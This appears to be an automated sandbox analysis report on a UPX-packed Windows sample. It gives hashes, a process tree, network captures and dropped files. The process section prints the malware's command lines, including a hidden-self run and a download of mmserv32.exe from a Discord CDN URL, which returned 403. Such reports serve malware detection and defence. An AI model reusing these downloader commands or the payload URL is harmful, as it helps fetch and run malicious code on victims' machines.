Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240221-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24/02/2024, 12:34 UTC

General

  • Target

    a1e0aa315c2caf13f0f7edacea3e9aea.exe

  • Size

    450KB

  • MD5

    a1e0aa315c2caf13f0f7edacea3e9aea

  • SHA1

    3e768bdf99b6e40d8da1a0a74f345c8a316a6b89

  • SHA256

    ca1c052698c5a5c7e5ddcd14a95709288a364cd0be7fa06d03c62c2ead4ea78b

  • SHA512

    40aa04ce71823a9fa163c970263967cba1bec99fff08ff1abb0d5ba0a7b450e9733e9910a63023ca12e26b9d38399b1750676dda70a934e97ecc0f4093c708d0

  • SSDEEP

    12288:0tzE5elwLz9Tr/G89suLMBU2R6rPfgi5QGRTYseAC+kYr8:0tA4KdTDG/hRaAiZRTyRpYA

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe
    "C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4940
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\573A.bat C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1080
      • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:4704
      • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:4436
      • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe" "mmserv32.exe" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:4192
      • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:2308

Network

  • flag-us
    DNS
    cdn.discordapp.com
    extd.exe
    Remote address:
    8.8.8.8:53
    Request
    cdn.discordapp.com
    IN A
    Response
    cdn.discordapp.com
    IN A
    162.159.129.233
    cdn.discordapp.com
    IN A
    162.159.135.233
    cdn.discordapp.com
    IN A
    162.159.133.233
    cdn.discordapp.com
    IN A
    162.159.134.233
    cdn.discordapp.com
    IN A
    162.159.130.233
  • flag-us
    GET
    https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe
    extd.exe
    Remote address:
    162.159.129.233:443
    Request
    GET /attachments/878569652987502634/878573089506607124/mmserv32.exe HTTP/1.1
    Host: cdn.discordapp.com
    Accept: */*
    Response
    HTTP/1.1 403 Forbidden
    Date: Sat, 24 Feb 2024 12:35:08 GMT
    Content-Type: text/plain;charset=UTF-8
    Content-Length: 36
    Connection: keep-alive
    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
    Set-Cookie: __cf_bm=FpFWf8aPhW3t6HmR7j9rgDQ4CAVcRILXR7dUhFUkP4Y-1708778108-1.0-AXMWXLVdS4wwkIM+Fhq5LAQG0j9XlB0evYnpHC3kpQZa2bbdS3TH6lzlLxMBiu+5h8X1z0cdj2kg+AaZAFEu/38=; path=/; expires=Sat, 24-Feb-24 13:05:08 GMT; domain=.discordapp.com; HttpOnly; Secure
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Yk7iu%2FJ2JMeoMzxywB9vtoAbed0n9GgKA8Hhh%2BpXUgi0XtoTRVB0kRqFw2bQdFw6IKVPUPit6bXUXsIXetITihvmfDR4ZwfLAUGU4JLWuz5QJD4EOaAl1lYcifpt5Y%2FMrCluQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Set-Cookie: _cfuvid=0YxYgp88QKoqvA4nIuiGV_yBlob8QBkl4pXz3CvkHDw-1708778108077-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 85a7bf276c4adc57-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    71.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    71.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    9.228.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    9.228.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.a-0001.a-msedge.net
    g-bing-com.a-0001.a-msedge.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=
    Remote address:
    204.79.197.200:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=072FBD863D4A61042F65A9A93CAA60F8; domain=.bing.com; expires=Thu, 20-Mar-2025 12:35:08 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 563EFC8741F14F619C26DCF8D62AE13B Ref B: LON04EDGE1013 Ref C: 2024-02-24T12:35:08Z
    date: Sat, 24 Feb 2024 12:35:08 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=
    Remote address:
    204.79.197.200:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=072FBD863D4A61042F65A9A93CAA60F8
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=pkv_0A10dR_1ry8EbrEzB2RY5aChSj5uanctW9CD4gE; domain=.bing.com; expires=Thu, 20-Mar-2025 12:35:08 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 996F1F60DE254F5B9E9FA949DF8D66AB Ref B: LON04EDGE1013 Ref C: 2024-02-24T12:35:08Z
    date: Sat, 24 Feb 2024 12:35:08 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=
    Remote address:
    204.79.197.200:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=072FBD863D4A61042F65A9A93CAA60F8; MSPTC=pkv_0A10dR_1ry8EbrEzB2RY5aChSj5uanctW9CD4gE
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 694C17653991457C83F9EE97DC1E1955 Ref B: LON04EDGE1013 Ref C: 2024-02-24T12:35:08Z
    date: Sat, 24 Feb 2024 12:35:08 GMT
  • flag-us
    DNS
    233.129.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    233.129.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001.a-msedge.net
  • flag-us
    DNS
    173.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    173.178.17.96.in-addr.arpa
    IN PTR
    Response
    173.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-173.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    41.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.110.16.96.in-addr.arpa
    IN PTR
    Response
    41.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-41.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.135.221.88.in-addr.arpa
    IN PTR
    Response
    217.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-217.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    209.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.178.17.96.in-addr.arpa
    IN PTR
    Response
    209.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-209.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    25.73.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.73.42.20.in-addr.arpa
    IN PTR
    Response
  • 162.159.129.233:443
    https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe
    tls, http
    extd.exe
    903 B
    4.5kB
    10
    8

    HTTP Request

    GET https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe

    HTTP Response

    403
  • 204.79.197.200:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=
    tls, http2
    2.0kB
    9.2kB
    22
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=

    HTTP Response

    204
  • 8.8.8.8:53
    cdn.discordapp.com
    dns
    extd.exe
    64 B
    144 B
    1
    1

    DNS Request

    cdn.discordapp.com

    DNS Response

    162.159.129.233
    162.159.135.233
    162.159.133.233
    162.159.134.233
    162.159.130.233

  • 8.8.8.8:53
    71.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    71.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    9.228.82.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    9.228.82.20.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    158 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    233.129.159.162.in-addr.arpa
    dns
    74 B
    136 B
    1
    1

    DNS Request

    233.129.159.162.in-addr.arpa

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    73 B
    106 B
    1
    1

    DNS Request

    200.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    173.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    173.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    41.110.16.96.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    41.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    217.135.221.88.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    217.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    209.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    209.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    25.73.42.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    25.73.42.20.in-addr.arpa

Downloads

  • C:\Users\Admin\AppData\Local\Temp\1773\mmserv32.exe

    Filesize

    36B

    MD5

    a1ca4bebcd03fafbe2b06a46a694e29a

    SHA1

    ffc88125007c23ff6711147a12f9bba9c3d197ed

    SHA256

    c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

    SHA512

    6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

  • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\573A.bat

    Filesize

    942B

    MD5

    4cab807999cdd7910b9c43bdb8f7d211

    SHA1

    42438338c0330a539e92f6430c95c24d7cd8ab63

    SHA256

    ccbe8fa4538ad416b1b340d8dff530c12d46eb3041350b953456fb09a115de79

    SHA512

    355d8a31dc40fe01a093eaf390c59fe33bb1281a00d604b0341d02923241b1be16b771a98a6f5d069083efa4e9e801d7b652d1729015f8fd1de0e0f3f7b3f356

  • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe

    Filesize

    326KB

    MD5

    c14ce13ab09b4829f67a879d735a10a1

    SHA1

    537e1ce843f07ce629699ef5742c42ee2f06e9b6

    SHA256

    ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

    SHA512

    c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

  • memory/2308-22-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

  • memory/4192-16-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

  • memory/4436-9-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

  • memory/4436-10-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

  • memory/4704-6-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

  • memory/4704-7-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB
